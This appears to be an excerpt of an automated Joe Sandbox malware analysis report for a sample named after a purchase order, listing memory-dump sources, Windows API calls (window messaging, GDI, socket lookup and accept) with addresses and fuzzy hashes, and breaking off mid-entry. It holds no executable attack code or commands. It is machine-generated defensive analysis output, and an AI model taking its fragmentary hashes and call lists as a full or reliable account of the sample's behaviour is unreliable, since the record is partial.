                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: lstrcmpilstrcpylstrlen$_malloc
                • String ID: cdecl
                • API String ID: 3850814276-3896280584
                • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                APIs
                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                • _memmove.LIBCMT ref: 0046D475
                • inet_ntoa.WSOCK32(?), ref: 0046D481
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                • String ID:
                • API String ID: 2502553879-0
                • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                APIs
                • SendMessageW.USER32 ref: 00448C69
                • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$LongWindow
                • String ID:
                • API String ID: 312131281-0
                • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                APIs
                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorLastacceptselect
                • String ID:
                • API String ID: 385091864-0
                • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                APIs
                • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                • GetStockObject.GDI32(00000011), ref: 00430258
                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$CreateMessageObjectSendShowStock
                • String ID:
                • API String ID: 1358664141-0
                • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                APIs
                • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                • String ID:
                • API String ID: 2880819207-0
                • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                APIs
                • GetWindowRect.USER32(?,?), ref: 00430BA2
                • ScreenToClient.USER32(?,?), ref: 00430BC1
                • ScreenToClient.USER32(?,?), ref: 00430BE2
                • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ClientRectScreen$InvalidateWindow
                • String ID:
                • API String ID: 357397906-0
                • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                APIs
                • __wsplitpath.LIBCMT ref: 0043392E
                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                • __wsplitpath.LIBCMT ref: 00433950
                • __wcsicoll.LIBCMT ref: 00433974
                • __wcsicoll.LIBCMT ref: 0043398A
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                • String ID:
                • API String ID: 1187119602-0
                • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcslen$_malloc_wcscat_wcscpy
                • String ID:
                • API String ID: 1597257046-0
                • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                APIs
                • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                • __malloc_crt.LIBCMT ref: 0041F5B6
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: EnvironmentStrings$Free__malloc_crt
                • String ID:
                • API String ID: 237123855-0
                • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: DeleteDestroyObject$IconWindow
                • String ID:
                • API String ID: 3349847261-0
                • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                APIs
                • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                • String ID:
                • API String ID: 2223660684-0
                • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                APIs
                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                • LineTo.GDI32(?,?,?), ref: 00447326
                • EndPath.GDI32(?), ref: 00447336
                • StrokePath.GDI32(?), ref: 00447344
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                • String ID:
                • API String ID: 2783949968-0
                • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                APIs
                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                • GetCurrentThreadId.KERNEL32 ref: 004364A3
                • AttachThreadInput.USER32(00000000), ref: 004364AA
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                • String ID:
                • API String ID: 2710830443-0
                • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                • String ID:
                • API String ID: 146765662-0
                • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                APIs
                • GetDesktopWindow.USER32 ref: 00472B63
                • GetDC.USER32(00000000), ref: 00472B6C
                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                • ReleaseDC.USER32(00000000,?), ref: 00472B99
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CapsDesktopDeviceReleaseWindow
                • String ID:
                • API String ID: 2889604237-0
                • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
